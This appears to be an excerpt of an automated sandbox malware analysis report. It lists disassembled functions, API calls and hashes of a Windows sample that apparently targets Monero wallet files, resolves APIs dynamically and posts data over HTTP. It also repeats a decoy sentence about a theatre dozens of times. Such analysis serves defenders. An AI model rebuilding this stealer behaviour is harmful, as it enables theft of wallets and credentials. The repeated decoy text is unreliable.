                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344729
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 64b8212c52e7696cdbe1479303a96098566ba1d1030da1bbecb0962fe2976015
                            • Instruction ID: 7e158ea0ac7612999dc559f3a0d327aae8e645cf519f435fcd61821575978b28
                            • Opcode Fuzzy Hash: 64b8212c52e7696cdbe1479303a96098566ba1d1030da1bbecb0962fe2976015
                            • Instruction Fuzzy Hash: CA41F7606CA6047FE626FFA48C42EDD76665F47B08F609266EC02662C4DFB07711CF22
                            Function 00344880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 344880-344942 call 35a7a0 call 3447b0 call 35a740 * 5 InternetOpenA StrCmpCA 816 344944 801->816 817 34494b-34494f 801->817 816->817 818 344955-344acd call 358b60 call 35a920 call 35a8a0 call 35a800 * 2 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a920 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a920 call 35a8a0 call 35a800 * 2 InternetConnectA 817->818 819 344ecb-344ef3 InternetCloseHandle call 35aad0 call 349ac0 817->819 818->819 905 344ad3-344ad7 818->905 829 344ef5-344f2d call 35a820 call 35a9b0 call 35a8a0 call 35a800 819->829 830 344f32-344fa2 call 358990 * 2 call 35a7a0 call 35a800 * 8 819->830 829->830 906 344ae5 905->906 907 344ad9-344ae3 905->907 908 344aef-344b22 HttpOpenRequestA 906->908 907->908 909 344ebe-344ec5 InternetCloseHandle 908->909 910 344b28-344e28 call 35a9b0 call 35a8a0 call 35a800 call 35a920 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a920 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a920 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a9b0 call 35a8a0 call 35a800 call 35a920 call 35a8a0 call 35a800 call 35a740 call 35a920 * 2 call 35a8a0 call 35a800 * 2 call 35aad0 lstrlen call 35aad0 * 2 lstrlen call 35aad0 HttpSendRequestA 908->910 909->819 1021 344e32-344e5c InternetReadFile 910->1021 1022 344e67-344eb9 InternetCloseHandle call 35a800 1021->1022 1023 344e5e-344e65 1021->1023 1022->909 1023->1022 1024 344e69-344ea7 call 35a9b0 call 35a8a0 call 35a800 1023->1024 1024->1021
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00344915
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 0034493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00344ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00360DDB,00000000,?,?,00000000,?,",00000000,?,00FBE8F8), ref: 00344DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00344E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00344E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00344E49
                            • InternetCloseHandle.WININET(00000000), ref: 00344EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00344EC5
                            • HttpOpenRequestA.WININET(00000000,00FBE808,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00344B15
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • InternetCloseHandle.WININET(00000000), ref: 00344ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: d36f861d965741e3353f251c713da8b731ea4cdccfc66d6795c73891b57efb6f
                            • Instruction ID: d91021983535b2ec174a55fbeccbcfa113ccd76f1c3ee7c791453d5059858bec
                            • Opcode Fuzzy Hash: d36f861d965741e3353f251c713da8b731ea4cdccfc66d6795c73891b57efb6f
                            • Instruction Fuzzy Hash: 7912BF719106189ADB16EB90DC52FEEB778BF14301F504299B9067A0A1EF702F4DEF62
                            Function 00357850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
                            • Instruction ID: 382db567b5f28807a282c879b7125c26bc07907a3d66d836a6c9018424b660b3
                            • Opcode Fuzzy Hash: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
                            • Instruction Fuzzy Hash: D4F04FB1944208ABD710DF98DD4AFAEBBBCEB04711F10025AFA05A2690C77415088BA1
                            Function 00341160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
                            • Instruction ID: 12c7f7f02a108517f9236bcc2fd6dcc8033ba324cd04d8b331c8030b07bad9f4
                            • Opcode Fuzzy Hash: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
                            • Instruction Fuzzy Hash: 18D05E7490030CDBDB00DFE0D8496DDBBB8FB08311F001555DD05B2340EA306486DBA6
                            Function 00359C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 359c10-359c1a 634 35a036-35a0ca LoadLibraryA * 8 633->634 635 359c20-35a031 GetProcAddress * 43 633->635 636 35a146-35a14d 634->636 637 35a0cc-35a141 GetProcAddress * 5 634->637 635->634 638 35a216-35a21d 636->638 639 35a153-35a211 GetProcAddress * 8 636->639 637->636 640 35a21f-35a293 GetProcAddress * 5 638->640 641 35a298-35a29f 638->641 639->638 640->641 642 35a2a5-35a332 GetProcAddress * 6 641->642 643 35a337-35a33e 641->643 642->643 644 35a344-35a41a GetProcAddress * 9 643->644 645 35a41f-35a426 643->645 644->645 646 35a4a2-35a4a9 645->646 647 35a428-35a49d GetProcAddress * 5 645->647 648 35a4dc-35a4e3 646->648 649 35a4ab-35a4d7 GetProcAddress * 2 646->649 647->646 650 35a515-35a51c 648->650 651 35a4e5-35a510 GetProcAddress * 2 648->651 649->648 652 35a612-35a619 650->652 653 35a522-35a60d GetProcAddress * 10 650->653 651->650 654 35a67d-35a684 652->654 655 35a61b-35a678 GetProcAddress * 4 652->655 653->652 656 35a686-35a699 GetProcAddress 654->656 657 35a69e-35a6a5 654->657 655->654 656->657 658 35a6a7-35a703 GetProcAddress * 4 657->658 659 35a708-35a709 657->659 658->659
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00FA5530), ref: 00359C2D
                            • GetProcAddress.KERNEL32(74DD0000,00FA52F0), ref: 00359C45
                            • GetProcAddress.KERNEL32(74DD0000,00FBA0C8), ref: 00359C5E
                            • GetProcAddress.KERNEL32(74DD0000,00FBA0F8), ref: 00359C76
                            • GetProcAddress.KERNEL32(74DD0000,00FBA128), ref: 00359C8E
                            • GetProcAddress.KERNEL32(74DD0000,00FBA140), ref: 00359CA7
                            • GetProcAddress.KERNEL32(74DD0000,00FABA20), ref: 00359CBF
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4C8), ref: 00359CD7
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4B0), ref: 00359CF0
                            • GetProcAddress.KERNEL32(74DD0000,00FBD528), ref: 00359D08
                            • GetProcAddress.KERNEL32(74DD0000,00FBD450), ref: 00359D20
                            • GetProcAddress.KERNEL32(74DD0000,00FA5290), ref: 00359D39
                            • GetProcAddress.KERNEL32(74DD0000,00FA5550), ref: 00359D51
                            • GetProcAddress.KERNEL32(74DD0000,00FA5570), ref: 00359D69
                            • GetProcAddress.KERNEL32(74DD0000,00FA5590), ref: 00359D82
                            • GetProcAddress.KERNEL32(74DD0000,00FBD558), ref: 00359D9A
                            • GetProcAddress.KERNEL32(74DD0000,00FBD438), ref: 00359DB2
                            • GetProcAddress.KERNEL32(74DD0000,00FABAC0), ref: 00359DCB
                            • GetProcAddress.KERNEL32(74DD0000,00FA55B0), ref: 00359DE3
                            • GetProcAddress.KERNEL32(74DD0000,00FBD540), ref: 00359DFB
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4E0), ref: 00359E14
                            • GetProcAddress.KERNEL32(74DD0000,00FBD468), ref: 00359E2C
                            • GetProcAddress.KERNEL32(74DD0000,00FBD570), ref: 00359E44
                            • GetProcAddress.KERNEL32(74DD0000,00FA52B0), ref: 00359E5D
                            • GetProcAddress.KERNEL32(74DD0000,00FBD588), ref: 00359E75
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4F8), ref: 00359E8D
                            • GetProcAddress.KERNEL32(74DD0000,00FBD3D8), ref: 00359EA6
                            • GetProcAddress.KERNEL32(74DD0000,00FBD420), ref: 00359EBE
                            • GetProcAddress.KERNEL32(74DD0000,00FBD3F0), ref: 00359ED6
                            • GetProcAddress.KERNEL32(74DD0000,00FBD498), ref: 00359EEF
                            • GetProcAddress.KERNEL32(74DD0000,00FBD408), ref: 00359F07
                            • GetProcAddress.KERNEL32(74DD0000,00FBD480), ref: 00359F1F
                            • GetProcAddress.KERNEL32(74DD0000,00FBD510), ref: 00359F38
                            • GetProcAddress.KERNEL32(74DD0000,00FB13F0), ref: 00359F50
                            • GetProcAddress.KERNEL32(74DD0000,00FBD018), ref: 00359F68
                            • GetProcAddress.KERNEL32(74DD0000,00FBCEC8), ref: 00359F81
                            • GetProcAddress.KERNEL32(74DD0000,00FA5210), ref: 00359F99
                            • GetProcAddress.KERNEL32(74DD0000,00FBD048), ref: 00359FB1
                            • GetProcAddress.KERNEL32(74DD0000,00FA5230), ref: 00359FCA
                            • GetProcAddress.KERNEL32(74DD0000,00FBCFD0), ref: 00359FE2
                            • GetProcAddress.KERNEL32(74DD0000,00FBD078), ref: 00359FFA
                            • GetProcAddress.KERNEL32(74DD0000,00FA5390), ref: 0035A013
                            • GetProcAddress.KERNEL32(74DD0000,00FA5850), ref: 0035A02B
                            • LoadLibraryA.KERNEL32(00FBCFE8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A03D
                            • LoadLibraryA.KERNEL32(00FBD0A8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A04E
                            • LoadLibraryA.KERNEL32(00FBCF28,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A060
                            • LoadLibraryA.KERNEL32(00FBCF88,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A072
                            • LoadLibraryA.KERNEL32(00FBCE08,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A083
                            • LoadLibraryA.KERNEL32(00FBCF58,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A095
                            • LoadLibraryA.KERNEL32(00FBD060,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0A7
                            • LoadLibraryA.KERNEL32(00FBCFB8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0B8
                            • GetProcAddress.KERNEL32(75290000,00FA5670), ref: 0035A0DA
                            • GetProcAddress.KERNEL32(75290000,00FBCE20), ref: 0035A0F2
                            • GetProcAddress.KERNEL32(75290000,00FB99A8), ref: 0035A10A
                            • GetProcAddress.KERNEL32(75290000,00FBD0C0), ref: 0035A123
                            • GetProcAddress.KERNEL32(75290000,00FA5650), ref: 0035A13B
                            • GetProcAddress.KERNEL32(734C0000,00FAB958), ref: 0035A160
                            • GetProcAddress.KERNEL32(734C0000,00FA5710), ref: 0035A179
                            • GetProcAddress.KERNEL32(734C0000,00FABBD8), ref: 0035A191
                            • GetProcAddress.KERNEL32(734C0000,00FBCEE0), ref: 0035A1A9
                            • GetProcAddress.KERNEL32(734C0000,00FBCDF0), ref: 0035A1C2
                            • GetProcAddress.KERNEL32(734C0000,00FA5610), ref: 0035A1DA
                            • GetProcAddress.KERNEL32(734C0000,00FA59B0), ref: 0035A1F2
                            • GetProcAddress.KERNEL32(734C0000,00FBD000), ref: 0035A20B
                            • GetProcAddress.KERNEL32(752C0000,00FA5930), ref: 0035A22C
                            • GetProcAddress.KERNEL32(752C0000,00FA58B0), ref: 0035A244
                            • GetProcAddress.KERNEL32(752C0000,00FBCEF8), ref: 0035A25D
                            • GetProcAddress.KERNEL32(752C0000,00FBCE38), ref: 0035A275
